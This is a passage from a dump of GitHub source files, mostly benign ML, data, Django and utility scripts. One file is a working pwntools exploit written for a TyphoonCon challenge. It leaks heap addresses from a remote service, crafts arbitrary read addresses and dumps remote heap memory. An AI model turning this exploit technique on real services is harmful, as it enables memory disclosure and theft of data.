simplify_file_name='RemainEatingTimeRegression_Simplify.onnx'):\n \"\"\" 創建onnx檔案,如果有需要可以同步創建onnx_simplify檔案\n Args:\n model_phi: 模型大小\n setting: 模型設定資料,會在生成訓練資料的時候同時生成\n pretrained: 訓練權重位置\n with_simplify: 是否要啟用簡化onnx步驟\n input_name: 輸入的名稱,主要會跟後面步驟有關係\n output_name: 輸出的名稱,主要會跟後面步驟有關係\n onnx_file_name: pytorch輸出的onnx檔案名稱\n simplify_file_name: 透過簡化後的onnx檔案名稱,如果沒有要進行簡化就不需要設定\n \"\"\"\n support_model_phi = {\n 'stander': {'input_size': 32, 'hidden_size': 64, 'num_layers': 2}\n }\n model_cfg = support_model_phi.get(model_phi, None)\n assert model_cfg is not None, f'指定的模型大小{model_phi}不支援,如有需要請自行添加'\n settings = parser_setting(setting)\n model_cfg['remain_time_classes'] = settings['remain_time_padding_value'] + 1\n model = RemainEatingTimeRegressionNet(**model_cfg)\n model = load_pretrained(model, pretrained_path=pretrained)\n mock_food_remain = get_mock_data(settings)\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model = model.to(device)\n mock_food_remain = mock_food_remain.to(device)\n input_names = [input_name]\n output_names = [output_name]\n with torch.no_grad():\n torch.onnx.export(model, mock_food_remain, onnx_file_name, input_names=input_names,\n output_names=output_names, opset_version=11)\n if with_simplify:\n simplify_onnx(onnx_path=onnx_file_name, output_path=simplify_file_name)\n\n\ndef create_onnx_session(onnx_file='RemainEatingTimeRegression_Simplify.onnx', gpu='auto'):\n \"\"\" 創建可以用onnx執行的對象\n Args:\n onnx_file: 指定onnx檔案\n gpu: 設定成auto會自動偵測是否在gpu模式下\n \"\"\"\n try:\n import onnxruntime\n except ImportError:\n raise ImportError('如果需要使用onnxruntime進行推理需要安裝onnxruntime')\n assert os.path.exists(onnx_file), '給定的onnx檔案路徑不存在'\n if gpu == 'auto':\n gpu = True if onnxruntime.get_device() == 'GPU' else False\n if not gpu:\n session = onnxruntime.InferenceSession(onnx_file)\n else:\n session = onnxruntime.InferenceSession(onnx_file, providers=['CUDAExecutionProvider'])\n return session\n\n\ndef transform_food_remain_to_model_input(food_remain, settings):\n \"\"\"\n Args:\n food_remain: 食物剩餘量\n settings: 模型設定資料,這裡需要是dict格式,避免每次到這裡都需要對檔案進行讀取,浪費時間\n \"\"\"\n assert isinstance(settings, dict), '傳入到transform food remain to model input的settings需要是dict格式,' \\\n '這是為了避免效率問題'\n max_length = settings.get('max_length', None)\n remain_start_value = settings.get('remain_start_value', None)\n remain_end_value = settings.get('remain_end_value', None)\n remain_padding_value = settings.get('remain_padding_value', None)\n assert max_length is not None and remain_start_value is not None and remain_end_value is not None and \\\n remain_padding_value is not None, '傳入的setting有誤'\n food_remain = np.array(food_remain)\n food_remain = np.append(np.array([remain_start_value]), food_remain)\n food_remain = np.append(food_remain, np.array([remain_end_value]))\n food_remain = np.append(food_remain, np.array([remain_padding_value] * max_length))[:max_length]\n food_remain = np.expand_dims(food_remain, axis=0)\n return food_remain\n\n\ndef onnxruntime_detection_image(onnx_model, food_remain, settings: Union = (str, dict), input_name='food_remain',\n output_name='time_remain'):\n \"\"\" 使用onnxruntime進行推理\n Args:\n onnx_model: onnxruntime模型\n food_remain: 食物剩餘量\n settings: 模型訓練參數,可以傳入dict或是檔案路徑\n input_name: 輸入到onnx的名稱,需要與生成onnx相同名稱\n output_name: 從onnx輸出的名稱,需要與生成onnx相同名稱\n \"\"\"\n if isinstance(settings, str):\n settings = parser_setting(settings)\n food_remain = transform_food_remain_to_model_input(food_remain, settings)\n food_remain = food_remain.astype(np.longlong)\n onnx_inputs = {input_name: food_remain}\n onnx_outputs = [output_name]\n onnx_preds = onnx_model.run(onnx_outputs, onnx_inputs)[0]\n onnx_preds = np.transpose(onnx_preds, (0, 2, 1))\n prediction = onnx_preds.argmax(axis=1).flatten()\n return prediction\n\n\ndef create_tensorrt_engine(onnx_file_path='RemainEatingTimeRegression_Simplify.onnx', fp16_mode=True, max_batch_size=1,\n trt_engine_path=None, save_trt_engine_path=None, dynamic_shapes=None,\n trt_logger_level='VERBOSE'):\n tensorrt_engine = TensorrtBase(onnx_file_path=onnx_file_path, fp16_mode=fp16_mode, max_batch_size=max_batch_size,\n dynamic_shapes=dynamic_shapes, save_trt_engine_path=save_trt_engine_path,\n trt_engine_path=trt_engine_path, trt_logger_level=trt_logger_level)\n return tensorrt_engine\n\n\ndef tensorrt_engine_detect_remain_time(tensorrt_engine, food_remain, settings: Union = (str, dict),\n input_name='food_remain', output_shapes='time_remain'):\n \"\"\" 使用tensorrt進行推理\n Args:\n tensorrt_engine: tensorrt推理引擎實力化對象\n food_remain: 食物剩餘量\n settings: 模型設定參數\n input_name: 輸入到onnx的名稱,需要與生成onnx相同名稱\n output_shapes: 從onnx輸出的名稱,需要與生成onnx相同名稱,或是指定的shape(這裡推薦可以用名稱就用名稱,比較方便也比較易懂)\n Returns:\n 推理結果\n \"\"\"\n if isinstance(settings, str):\n settings = parser_setting(settings)\n food_remain = transform_food_remain_to_model_input(food_remain, settings)\n food_remain = food_remain.astype(np.long)\n tensorrt_inputs = {input_name: np.ascontiguousarray(food_remain)}\n tensorrt_preds = tensorrt_engine.inference(input_datas=tensorrt_inputs, output_shapes=[output_shapes])[0]\n tensorrt_preds = np.transpose(tensorrt_preds, (0, 2, 1))\n prediction = tensorrt_preds.argmax(axis=1).flatten()\n return prediction\n\n\nif __name__ == '__main__':\n # create_onnx_file()\n # session = create_onnx_session()\n setting_path = './prepare/setting_0.json'\n remain = [100, 99, 98, 97, 96, 94, 93, 92, 92, 90, 90, 90, 89, 89, 89, 88, 88, 87, 87, 83, 82, 82, 82, 80, 79, 78,\n 76, 76, 76, 75, 75, 74, 74, 72, 72, 69, 68, 67, 66, 66, 65, 64, 64, 62, 62, 60, 60, 59, 56, 55, 55, 55,\n 54, 54, 52, 51, 50, 47, 46, 43, 43, 42, 41, 40, 40, 39, 38, 38, 36, 35, 34, 34, 34, 33, 32, 32, 31, 30,\n 29, 26, 24, 23, 23, 23, 23, 21, 16, 16, 15, 14, 13, 11, 11, 9, 9, 7, 7, 6, 5]\n # prediction = onnxruntime_detection_image(session, remain, settings=setting_path)\n # print(prediction)\n tensorrt_engine = create_tensorrt_engine(trt_engine_path='RemainEatingTimeRegression_Simplify.trt')\n prediction = tensorrt_engine_detect_remain_time(tensorrt_engine, remain, settings=setting_path)\n print(prediction)\n","repo_name":"chris901003/DeepLearning","sub_path":"SpecialTopic/Deploy/RemainEatingTimeRegression/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8189,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"34434374494","text":"def main():\n import wx\n from Prog.Window import WindowFrame\n app = wx.App(False)\n frame = WindowFrame()\n frame.Show()\n app.MainLoop()\n\ndef main2():\n from Prog.AutoFight import AutoFight\n A = AutoFight()\n A.AutoFight(1000)\n\ndef main3():\n\timport numpy as np\n\tfrom Prog.Binary import ReadTrainingDatasFromDirectory\n\tfrom Prog.Engine.kerasDQN_ai import kerasDQNPlayer\n\n\tAI = kerasDQNPlayer(1)\n\tdir_path=(\"./bin/\")\n\tTrainingData=ReadTrainingDatasFromDirectory(dir_path)\n\ttrain_x, val_x = np.split(TrainingData[0], [int(len(TrainingData[0])/10*9)])\n\ttrain_y1, val_y1 = np.split(TrainingData[1], [int(len(TrainingData[1])/10*9)])\n\ttrain_y2, val_y2 = np.split(TrainingData[2], [int(len(TrainingData[2])/10*9)])\n\tAI.learn(train_x, train_y1, train_y2, val_x, val_y1, val_y2)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"KCCTdensan/ProCon2018-Solver","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11518780883","text":"import copy\nimport logging\nfrom dataclasses import dataclass, field\nfrom typing import Optional, Dict, Sequence\n\nimport transformers\nfrom transformers import (\n Trainer, \n default_data_collator, \n set_seed,\n)\n\nfrom dataset_utils import (\n make_raw_dataset,\n make_tokenized_dataset, \n make_grouped_dataset, \n make_train_eval_dataset,\n preprocess_logits_for_metrics,\n compute_metrics,\n get_resume_checkpoint_or_None\n)\n\nfrom args import (\n ModelArguments,\n DataTrainingArguments,\n TrainingArguments\n)\n\nDEFAULT_PAD_TOKEN = \"[PAD]\"\nDEFAULT_EOS_TOKEN = \"\"\nDEFAULT_BOS_TOKEN = \"\"\nDEFAULT_UNK_TOKEN = \"\"\n\ndef safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str):\n \"\"\"Collects the state dict and dump to disk.\"\"\"\n state_dict = trainer.model.state_dict()\n if trainer.args.should_save:\n cpu_state_dict = {key: value.cpu() for key, value in state_dict.items()}\n del state_dict\n trainer._save(output_dir, state_dict=cpu_state_dict) # noqa\n\n\ndef smart_tokenizer_and_embedding_resize(\n special_tokens_dict: Dict,\n tokenizer: transformers.PreTrainedTokenizer,\n model: transformers.PreTrainedModel,\n):\n \"\"\"Resize tokenizer and embedding.\n Note: This is the unoptimized version that may make your embedding size not be divisible by 64.\n \"\"\"\n num_new_tokens = tokenizer.add_special_tokens(special_tokens_dict)\n model.resize_token_embeddings(len(tokenizer))\n\n if num_new_tokens > 0:\n input_embeddings = model.get_input_embeddings().weight.data\n output_embeddings = model.get_output_embeddings().weight.data\n\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\n\n\ndef train():\n parser = transformers.HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))\n model_args, data_args, training_args = parser.parse_args_into_dataclasses()\n\n # Set seed before initializing model.\n set_seed(training_args.seed)\n\n model = transformers.AutoModelForCausalLM.from_pretrained(\n model_args.model_name_or_path,\n cache_dir=training_args.cache_dir,\n )\n\n tokenizer = transformers.AutoTokenizer.from_pretrained(\n model_args.model_name_or_path,\n cache_dir=training_args.cache_dir,\n model_max_length=training_args.model_max_length,\n padding_side=\"right\",\n use_fast=False,\n )\n if tokenizer.pad_token is None:\n smart_tokenizer_and_embedding_resize(\n special_tokens_dict=dict(pad_token=DEFAULT_PAD_TOKEN),\n tokenizer=tokenizer,\n model=model,\n )\n if \"llama\" in model_args.model_name_or_path:\n tokenizer.add_special_tokens(\n {\n \"eos_token\": DEFAULT_EOS_TOKEN,\n \"bos_token\": DEFAULT_BOS_TOKEN,\n \"unk_token\": DEFAULT_UNK_TOKEN,\n }\n )\n \n\n raw_datasets = make_raw_dataset(data_args=data_args, cache_dir=training_args.cache_dir)\n tokenized_datasets = make_tokenized_dataset(tokenizer, raw_datasets, training_args=training_args, data_args=data_args)\n lm_datasets = make_grouped_dataset(tokenizer, tokenized_datasets, data_args=data_args, training_args=training_args)\n\n train_dataset, eval_dataset = make_train_eval_dataset(lm_datasets, data_args, training_args)\n\n trainer = Trainer(\n model=model,\n tokenizer=tokenizer, \n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n data_collator=default_data_collator, \n compute_metrics=compute_metrics,\n preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval else None,\n )\n checkpoint = get_resume_checkpoint_or_None(training_args)\n trainer.train(resume_from_checkpoint=checkpoint)\n trainer.save_state()\n \n safe_save_model_for_hf_trainer(trainer=trainer, output_dir=training_args.output_dir)\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"justinphan3110/deepspeed_lora","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20123829899","text":"import csv\n\ndata_month = {\n '01': 'well_jan_2018.csv',\n '02': 'well_feb_2018.csv',\n '03': 'well_march_2018.csv',\n '04': 'well_april_2018.csv',\n '05': 'well_may_2018.csv',\n '06': 'well_june_2018.csv',\n '07': 'well_july_2018.csv',\n '08': 'well_august_2018.csv',\n '09': 'well_sept_2018.csv',\n '10': 'well_oct_2018.csv'\n}\n\n\ndef extract_and_write(month, filename, writer):\n with open(filename) as file_pointer:\n file_pointer.readline()\n for line in file_pointer:\n line = line.lower()\n\n if line.startswith(\"total\"):\n print(\"last line\", line)\n break\n\n data = line.split(\",\")\n day = data[0]\n date_time = '2018-' + month + '-' + day\n\n well_total = 0\n for i in range(1,18):\n try:\n\n well_i = float(data[i])\n well_total = well_total + well_i\n writer.writerow([date_time, i, well_i])\n except:\n print(\"Soemthing went wrong: date\", date_time, \"; data:\", data)\n break\n if well_total <= 0.1:\n print(\"not valid calendar day:\", date_time)\n continue\n day_total = float(data[len(data) - 1])\n if well_total != day_total:\n print(\"invalid calculation for day:\", date_time, \";total=\", day_total, \"; calculated:\", well_total)\n\n\nwith open(\"well_daily.csv\", \"w\", newline='') as csvfile:\n my_writer = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n my_writer.writerow([\"date\", \"well\", \"pump\"])\n\n for m, filePath in data_month.items():\n extract_and_write(month=m, filename='../confi_data/well_water/' + filePath, writer=my_writer)\n # break","repo_name":"litpuvn/water-audit","sub_path":"data/create_well_daily_data.py","file_name":"create_well_daily_data.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34362879581","text":"from sys import argv\n\"\"\" \nscript, userName, school = argv\n\nprompt = '> '\n\nprint(f\"Hi {userName}, I'm the {script} script.\")\n\nprint(\"I'd like ask you a few questions.\")\n\nprint(f\"Do you like me {userName}?\")\n\nlikes = input(prompt)\n\nprint(f\"Where do you live {userName}?\")\nlives = input(prompt)\n\nprint(f\"What kind of computer do you have?\")\n\ncomputer = input(prompt)\n\nprint(f\"\"\"\n#Alright, so you said {likes} about liking me.\n#You live in {lives} and you're a student of {school}. Not sure where that is.\n#And you have a {computer}. Nice.\n#\"\"\") \"\"\"\n\nscript, fileName = argv\n\nprompt = \">> \"\n\nprint('Do you want to clear content of the file?')\nreply = input(prompt)\n\nif reply == \"Yes\" or reply == \"yes\":\n #open the file\n fileToOpen = open(fileName, 'w')\n \n fileToOpen.truncate()\n fileToOpen.close()\n \n print(\"File content was cleared successfully\")\n\nelse:\n print('Do you want to write to the file?')\n reply = input(prompt)\n\n if reply == \"Yes\" or reply == \"yes\":\n \n print('Enter the content for the file')\n \n content = input(prompt)\n \n fileToOpen = open(\"sample.txt\", 'a')\n\n fileToOpen.write(\"\\n\"+content)\n\n fileToOpen.close()\n\n print(\"Your contents have been saved to file\")\n\n else:\n\n print(\"Nothing happened to file\") \n\n\n","repo_name":"hagios2/Py-Tutorials","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41074569464","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport requests #用来抓取网页的html源码\nimport random #取随机数\nimport time #时间相关操作\nfrom bs4 import BeautifulSoup #用于代替正则式 取源码中相应标签中的内容\n\ndef get_content(url, data = None):\n #设置headers是为了模拟浏览器访问 否则的话可能会被拒绝 可通过浏览器获取\n header = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection': 'keep-alive',\n 'Accept-Encoding': 'br, gzip, deflate',\n 'Accept-Language':'zh-cn',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15'\n }\n #设置一个超时时间 取随机数 是为了防止网站被认定为爬虫\n timeout = random.choice(range(80,180))\n\n while True:\n try:\n req = requests.get(url=url, headers = header, timeout = timeout,)\n break\n except Exception as e:\n time.sleep(random.choice(range(8, 15)))\n return req.content.decode('gb2312','ignore').encode('utf-8')\n\nif __name__ == '__main__':\n serverurl = 'https://www.iimanhua.com'\n url = 'https://www.iimanhua.com/comic/2362/'\n html = get_content(url)\n soup = BeautifulSoup( html ,'html.parser')\n # 小说图片\n sectionList = soup.find(attrs={'id':'play_0'}).ul.find_all('li')\n for section in sectionList:\n print(section.a[\"href\"])\n print(section.a[\"title\"])\n","repo_name":"ygg404/gis","sub_path":"UtilTool/UtilBz/ii/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72900680542","text":"\"\"\"\nhttps://leetcode.com/problems/minimize-deviation-in-array/\n\"\"\"\n\n\nfrom heapq import heappush, heappop\n\n\nclass Solution:\n def minimumDeviation(self, nums: List[int]) -> int:\n \"\"\"\n 1. For each number in the given list, calculate the lower and the\n higher bound it could reach:\n 1.1 For odd numbers, it is [x, x * 2].\n 1.2 For even numbers, it is\n [keep divide by 2 until it becomes an odd number, x].\n\n 2. Then store those bounds into a heap and set the initial difference\n to the maximum lower bound - the minimum lower bound.\n\n 3. Then we keep looking at the smallest lower bound in the heap:\n 3.1 If lower bound * 2 is still less than higher bound, we push\n [lower * 2, higher] to the heap.\n 3.2 Else, we could add increase the smallest lower bound any more,\n thus the current difference is our answer.\n \"\"\"\n def get_bound(i: int) -> tuple[int]:\n if i & 1: # Even number:\n return (i, i << 1)\n else: # Odd number.\n low = i\n while not low & 1:\n low >>= 1\n\n return (low, i)\n\n maxVal = float('-inf')\n h = []\n for num in nums:\n low, high = get_bound(num)\n heappush(h, (low, high))\n maxVal = max(maxVal, low)\n\n minDiff = maxVal - h[0][0]\n while True:\n low, high = heappop(h)\n if low >= high: # Could not increase lower bound any more.\n break\n\n low <<= 1\n maxVal = max(maxVal, low)\n heappush(h, (low, high))\n minDiff = min(minDiff, maxVal - h[0][0])\n\n return minDiff\n","repo_name":"eronekogin/leetcode","sub_path":"2021/minimize_deviation_in_array.py","file_name":"minimize_deviation_in_array.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4980224731","text":"import sys\nfrom pwn import *\n\nREMOTE_ADDR = '10.0.2.2'\nREMOTE_PORT = 13337\n\nif len(sys.argv) > 1:\n REMOTE_ADDR = sys.argv[1]\n\n# Target string copied from 0x0134823C into buffers[254].\n\n# There is a data structure holding the messages for each thread like\n# struct thread_input\n# {\n# __int64 thread_index;\n# __int64 len;\n# char *buf;\n# };\n# The thread index is incremented for every child socket that connects.\n# The other two fields are used differently depending on the command sent.\n\n# Layout of a network message frame:\n# 0-4: magic number 0xdeadbeef\n# 5: number of commands in this frame\n# 6: command id (0, 2, 3, 4)\n# next bytes depend on command id\n\n# Command 0: No Op\n# len and buf = 0\n\n# Command 2: To uppercase (AND 0xdf)\n# Command 3: To lowercase (OR 0x20)\n# 1 byte: length of string\n# rest: content of string\n# Content is copied into one of the buffers allocated at the start of the application.\n\n# Command 4:\n# 4 bytes: number1\n# 4 bytes: number2\n# Puts the following in the above thread_input struct\n# len = number1 % number2\n# buf = number1 * number2\n\n\ndef send_toupper(strings, expected_min_length=1):\n if len(strings) > 0xff:\n raise Exception(\"Too many strings {} > 255\".format(len(strings)))\n # magic number of commands command id\n frame = p32(0xdeadbeef) + p8(len(strings)) + p8(2)\n\n for s in strings:\n if len(s) > 255:\n raise Exception(\"String too long {} > 255\".format(len(s)))\n frame += p8(len(s))\n frame += s\n \n # Only recv 4096 bytes chunks.\n if len(frame) > 4096:\n raise Exception(\"Frame too large. {} > 4096\".format(len(frame)))\n r.send(frame)\n\n recv_frames = b''\n while len(recv_frames) < expected_min_length:\n recv_frames += r.recv(timeout=60)\n #print(hexdump(recv_frames))\n \n # Parse the response.\n assert(u32(recv_frames[:4]) == 0xdeadbeef)\n num_strings = u8(recv_frames[4])\n command_id = u8(recv_frames[5])\n log.info('Received {} strings for command {}'.format(num_strings, command_id))\n assert(command_id == 2)\n\n strings = []\n offs = 6\n for i in range(num_strings):\n length = u8(recv_frames[offs:offs+1])\n strings.append((length, recv_frames[offs+1:offs+1+length]))\n #log.info('Message {}: {:x} | {}'.format(i, strings[i][0], strings[i][1]))\n offs += length + 1\n return strings, recv_frames\n\ndef send_address(addresses):\n if len(addresses) > 0xff:\n raise Exception(\"Too many addresses {} > 255\".format(len(addresses)))\n # magic number of commands command id\n frame = p32(0xdeadbeef) + p8(len(addresses)) + p8(4)\n\n for a in addresses:\n needed_length = a[1]\n while a[0] % needed_length != 0:\n needed_length += 1\n frame += p32(needed_length) + p32(a[0] // needed_length)\n \n r.send(frame)\n if len(frame) > 4096:\n raise Exception(\"Frame too large. {} > 4096\".format(len(frame)))\n\n recv_frames = r.recv(timeout=60)\n #print(hexdump(recv_frames))\n\n assert(u32(recv_frames[:4]) == 0xdeadbeef)\n num_commands = u8(recv_frames[4])\n command_id = u8(recv_frames[5])\n log.info('Received {} messages for command {}'.format(num_commands, command_id))\n assert(command_id == 4)\n\n expected_size = 6 + num_commands * 8\n if len(recv_frames) < expected_size:\n log.warn('Response truncated! {} < {}'.format(len(recv_frames), expected_size))\n recv_frames += r.recv()\n\n commands = []\n for i in range(num_commands):\n offs = 6 + 8 * i\n commands.append((u32(recv_frames[offs:offs+4]), u32(recv_frames[offs+4:offs+8])))\n #log.info('Message {}: {:x} | {:x}'.format(i, commands[i][0], commands[i][1]))\n return commands\n\nr = remote(REMOTE_ADDR, REMOTE_PORT)\n\nlog.info('Putting heap addresses of buffers into the vector.')\n# first put the address of the 253 buffer into the list\nsend_toupper(['A']*253)\n\n# Abuse the bug, that the per-thread message vectors in the child threads\n# are persistent over different received messages.\n# So the items you've added using one command will be sent back using\n# the response packing code of the current command.\n# You can use the multiply and modulo command #4 to leak the addresses of the\n# buffers put into the vector by the previous ascii-to-uppercase command #2 above.\n# Same way around you can craft any address using command #4 and print the memory using command #2 later.\nlog.info('Leak the addresses.')\nKUSER_SHARED_DATA = 0x7ffe0000 # use some pointer we can be sure is valid\nresponse = send_address([(KUSER_SHARED_DATA, 1)])\n\n# Heap addresses are growing in 0x10000 chunks. \n# Since the buffers are all malloc'd in sequence their addresses\n# grow nearly sequencially. So we assume the last buffer allocated,\n# which contains the target \"TyphoonCon\" string, is in the range around\n# where the other high buffer addresses are.\naddresses = [a[1] & 0xfffff000 for a in response[:-1]]\naddresses = list(set(addresses))\naddresses.sort()\n#print(addresses)\n\n# Dump the last 0xa000 bytes around the end of the know heap buffer addresses.\nDUMP_SIZE = 0xa000\n#DUMP_SIZE = 0x10000\nfirst_heap_page = addresses[-1] - (DUMP_SIZE / 2)\nlast_heap_page = addresses[-1] + (DUMP_SIZE / 2)\nr.close()\n\n# Start a new session, so we have a fresh message queue.\nr = remote(REMOTE_ADDR, REMOTE_PORT)\nlog.info('Dumping heap 0x{:x} - 0x{:x} ({:x} bytes)'.format(first_heap_page, last_heap_page, DUMP_SIZE))\n\n# Depending on the heap base address, get as much data per message as possible,\n# given the formula used in message handler 4.\n# 4 bytes: new_len = len % buf\n# 4 bytes: new_buf = buf * len\ndef find_largest_possible_size(addr):\n largest_possible_size = 0\n for i in range(addr, 0, -1):\n if addr % i != 0:\n continue\n sent_buf = addr // i\n resulting_len = i % sent_buf\n if resulting_len == i and resulting_len > largest_possible_size:\n largest_possible_size = resulting_len\n return largest_possible_size\n\naddresses = []\naddr = first_heap_page\nwhile addr < last_heap_page + 0x1000:\n size = find_largest_possible_size(addr)\n addresses.append((addr, size))\n addr += size\n\n# The size returned to the user is only 1 byte,\n# but all 4 bytes are used for the size when copying the values.\n# So we can have it return longer chunks of data than the command #2\n# usually allows due to the 1 byte length field.\nsend_address(addresses)\n\n# See if we found the winning string in the dump.\n_, recv_frames = send_toupper(['B'], DUMP_SIZE)\nif b'TyphoonCon' in recv_frames:\n string_start = recv_frames.index(b'TyphoonCon')\n target_string = recv_frames[string_start:string_start+38]\n log.success('Found target string: {}'.format(target_string))\nelse:\n log.failure('Target string wasn\\'t in the dumped heap area. Exploit failed.')\nr.close()","repo_name":"ssd-secure-disclosure/typhooncon2019","sub_path":"TyphoonCon Challenge 2019/Peace-Maker/heapdump.py","file_name":"heapdump.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"7"} +{"seq_id":"33544907022","text":"\n\"\"\"Define functions to use in redis queue.\"\"\"\nimport time\nimport hashlib\n\nfrom rq import get_current_job\n\n\ndef hash_work(data_input, iterations):\n job = get_current_job()\n print(\"sleeping for 5 sec\")\n time.sleep(5)\n print(\"done sleeping\")\n print(f\"data_input is {data_input}\")\n output = b\"\"\n for i in range(iterations - 1):\n output = hashlib.sha512(output).digest()\n output = hashlib.sha512(output).digest().hex()\n print(f\"output is {output}\")\n return {\"job_id\": job.id,\n \"output_hash\": output}","repo_name":"sonegoh/cloud_computing","sub_path":"hw2/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70581772065","text":"from rest_framework import serializers\nfrom ..models import Order, OrderItem, DeliveryInformation, Checkout\nfrom products.api.serializers import ProductSerializer, ProductRelatedField\nfrom products.models import Product\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n price = serializers.SerializerMethodField()\n order = serializers.PrimaryKeyRelatedField(queryset=Order.valid_objects.all(), allow_empty=True)\n product = ProductRelatedField(queryset=Product.valid_objects.all())\n\n class Meta:\n model = OrderItem\n fields = ['order', 'product', 'expire_time', 'count', 'price']\n\n def get_price(self, obj):\n return obj.get_price()\n\n def validate(self, data):\n if data['count'] > data['product'].stock:\n raise serializers.ValidationError('product is not exist')\n return super(OrderItemSerializer, self).validate(data)\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n order_items = OrderItemSerializer(many=True)\n user = serializers.StringRelatedField(read_only=True)\n\n class Meta:\n model = Order\n fields = ('id', 'is_open', 'user', 'get_status_display', 'orders_price',\n 'get_payment_type_display', 'is_paid', 'order_items', 'status', 'payment_type')\n read_only_fields = ('orders_price', 'is_paid')\n extra_kwargs = {'status': {'write_only': True, 'default': 1},\n 'payment_type': {'write_only': True, 'default': 1}}\n\n def create(self, validated_data):\n order_items_data = validated_data.pop('order_items')\n user = self.context['request'].user\n if not order_items_data:\n return serializers.ValidationError('order_items can not empty')\n order = Order.objects.create(user=user, **validated_data)\n for order_item_data in order_items_data:\n order_item = OrderItem.objects.create(order=order, **order_item_data)\n order.order_items.add(order_item)\n order.orders_price += order_item.get_price()\n order.save()\n return order\n\n def update(self, instance, validated_data):\n items_instance = instance.order_items.all()\n items_data = validated_data.pop(\"order_items\")\n price = 0\n for item_data in items_data:\n item_id = item_data.get(\"id\")\n item_count = item_data.get(\"count\")\n new_items = []\n edited_items = []\n\n # If order item is exits update it else create new order itme\n\n # --------------------------------------------------> edite order item\n if item_id:\n try:\n item_instance = items_instance.get(id=item_id)\n except:\n raise serializers.ValidationError(\"Order Item dose not exist\")\n item_instance.count = item_count\n if item_instance.is_available():\n # item_instance.save() ------------------------------->save\n edited_items.append(item_instance)\n price += item_instance.get_price()\n else:\n raise serializers.ValidationError(\"This number of product is not available in stock\")\n\n # --------------------------------------------------> crete new order item\n elif not item_id:\n item_instance = OrderItem(order=instance, **item_data)\n if item_instance.is_available():\n new_items.append(item_instance)\n price += item_instance.get_price()\n else:\n raise serializers.ValidationError(\"This number of product is not available in stock\")\n\n\nclass DeliveryInformationSerializer(serializers.ModelSerializer):\n class Meta:\n model = DeliveryInformation\n fields = ('id', 'user', 'first_name', 'last_name', 'phone_number', 'address', 'postal_code')\n\n\nclass CheckoutSerializer(serializers.ModelSerializer):\n delivery_information = DeliveryInformationSerializer()\n order = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = Checkout\n fields = ('id', 'order', 'delivery_information', 'order', 'post_type', 'send_cost')\n","repo_name":"K-Roozbahani/Plant_Shop","sub_path":"plant_shop/orders/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71363557985","text":"from django.db import models\n\n\nclass People(models.Model):\n name=models.CharField(max_length=255)\n age=models.IntegerField()\n\n class Meta:\n verbose_name=\"Pessoa\"\n verbose_name_plural=\"Pessoas\"\n ordering=['name']\n \n def __str__(self):\n return self.name","repo_name":"lvleo21/django-custom-management-commands","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"21062432919","text":"import streamlit as st\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\ndef main():\n st.title(\"ml app\")\n generate_random = np.random.RandomState(667)\n inprand=st.slider(\"inserisci valore punti random\",1,1000,50)\n x = 10 * generate_random.rand(inprand)\n mu=0\n sigma=st.slider(\"inserisci sigma\",0,10,1)\n s=np.random.normal(mu,sigma,inprand)\n coe=st.slider(\"inserisci coeficente angolare\",1,10,1)\n y = coe * x + s\n fig =plt.figure(figsize = (10, 8))\n X=x.reshape(-1,1)\n\n model=LinearRegression()\n model.fit(X,y)\n y_pred=model.predict(X) #predice \n\n plt.scatter(x, y)\n plt.plot(x, y_pred,'-r')\n plt.title('Simple Linear Regression')\n 